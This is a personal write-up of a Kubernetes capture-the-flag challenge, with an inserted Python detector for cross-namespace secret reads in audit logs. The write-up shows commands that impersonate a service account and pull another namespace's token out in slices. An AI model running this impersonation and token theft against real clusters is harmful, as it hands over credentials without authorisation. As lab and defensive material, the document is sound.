March 21, 2020
What namespaces exist?
!honkctl get ns
default Active 84s
garden Active 61s
home Active 61s
kube-node-lease Active 85s
kube-public Active 85s
kube-system Active 85s
local-path-storage Active 75s
mod
Do any custom resources exist?
!honkctl get crds
NAME TODO
todo-1 Steal the groundskeepers keys.
todo-2 Get to the Pub.
todo-3 Get into the model-village.
todo-4 Steal the beautiful minature golden bell.
todo-5 ...and take it all the way back home.
Looks like the game is here.
Describing the first todo:
!honkctl describe todo todo-1
The hints are part of the spec:
!honkctl get todo todo-1 -o=jsonpath='{.spec.hint}'
Assume the groundskeeper and get into the pub namespace
!honkctl get pods --as system:serviceaccount:garden:groundskeeper -n pub
The pods have service accounts!
!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range .items[*]}{.metadata.name}{"|"}{end}'
Empty the pub's pockets (aka, get their service accounts):
!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range.items[*]}{.metadata.name}{"|"}{end}'
Get the token, so we can run !honkctl --token=<TOKEN>
A burly man can be somewhat grizzly. To get the burly-man token, we first get the secret name for the serviceAccount secret. Then we exfiltrate the base64 token value for that secret.
The honkctl slack app only shows around 250 characters, and a service token defaults to about 1200 characters, so the token is read in 250-character slices with cut.
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c1-250
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c251-500
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c501-750
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c751-1000
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath={".data.token"} | cut -c1001-1250
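What the steps above look like from the cluster side, as an added example that is not part of the original post or the honkctl project: a small detector that scans Kubernetes API audit events for service accounts, impersonated via --as or not, that successfully read secrets outside their own namespace. The audit lines are constructed for illustration, and the names honkctl-bot and system:serviceaccount:pub:default are assumptions.

```python
import json

# Constructed audit.k8s.io/v1 events, one JSON object per line, modelled on the
# commands in this write-up. "honkctl-bot" and "pub:default" are assumed names.
SAMPLE_AUDIT_LOG = """
{"verb":"list","user":{"username":"honkctl-bot"},"impersonatedUser":{"username":"system:serviceaccount:garden:groundskeeper"},"objectRef":{"resource":"pods","namespace":"pub"},"responseStatus":{"code":200}}
{"verb":"list","user":{"username":"honkctl-bot"},"impersonatedUser":{"username":"system:serviceaccount:garden:groundskeeper"},"objectRef":{"resource":"secrets","namespace":"pub"},"responseStatus":{"code":200}}
{"verb":"get","user":{"username":"honkctl-bot"},"impersonatedUser":{"username":"system:serviceaccount:garden:groundskeeper"},"objectRef":{"resource":"secrets","namespace":"pub","name":"default-token-dtcrs"},"responseStatus":{"code":200}}
{"verb":"get","user":{"username":"system:serviceaccount:pub:default"},"objectRef":{"resource":"secrets","namespace":"pub","name":"default-token-dtcrs"},"responseStatus":{"code":200}}
{"verb":"list","user":{"username":"system:serviceaccount:pub:default"},"objectRef":{"resource":"secrets","namespace":"home"},"responseStatus":{"code":403}}
"""

SA_PREFIX = "system:serviceaccount:"
READ_VERBS = {"get", "list", "watch"}


def sa_namespace(username):
    """Namespace of a service-account user name, or None for any other user."""
    if not username.startswith(SA_PREFIX):
        return None
    parts = username[len(SA_PREFIX):].split(":")
    return parts[0] if len(parts) == 2 else None


def find_cross_namespace_secret_reads(lines):
    """Flag allowed secret reads by a service account outside its own namespace."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or truncated line
        ref = event.get("objectRef") or {}
        status = (event.get("responseStatus") or {}).get("code", 0)
        if ref.get("resource") != "secrets" or event.get("verb") not in READ_VERBS:
            continue
        if status >= 400:
            continue  # request was denied, nothing was disclosed
        caller = (event.get("user") or {}).get("username", "")
        impersonated = (event.get("impersonatedUser") or {}).get("username")
        actor = impersonated or caller  # RBAC is evaluated for the impersonated user
        home_ns = sa_namespace(actor)
        if home_ns is not None and home_ns != ref.get("namespace"):
            findings.append({"actor": actor, "verb": event["verb"],
                             "impersonated_by": caller if impersonated else None,
                             "namespace": ref.get("namespace"), "name": ref.get("name")})
    return findings


if __name__ == "__main__":
    for finding in find_cross_namespace_secret_reads(SAMPLE_AUDIT_LOG.splitlines()):
        print(finding)
```

On the constructed log this reports the groundskeeper's list and get of secrets in pub, and skips the pod listing, the same-namespace read and the denied request.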
Taking a look around, there's only a configmap with the name bell... which is exactly what we were looking for.
!honkctl --token $TOKEN get cm bell -n model-village -o json
The configmap data reveals a pod object.
!honkctl --token $TOKEN get cm bell -n model-village -o jsonpath={".data.bell\\.yaml"}
apiVersion: v1
kind: Pod
metadata:
  name: bell
  namespace: home
  annotations:
    description: "A beautiful golden bell."
  labels:
    beautiful: 'true'
spec:
  containers:
  - name: bell
    image: mrbobbytables/bell:latest
    ports:
    - containerPort: 80
The challenge seems to be to get this container to run in the home namespace.
I've tried to
- copy the configmap to any namespace
!honkctl --token $TOKEN get cm bell -n model-village -o yaml | kubectl --token $TOKEN -n home apply -f -
- apply the pod spec to the home namespace
!honkctl --token $TOKEN get cm --export bell -n model-village -o jsonpath={".data.bell\\.yaml"} | kubectl --token $TOKEN apply -f -
I don't really know how to create anything in that namespace.
The full solution has been posted: https://github.com/honk-ci/honkctl/tree/master/challenges/2020-march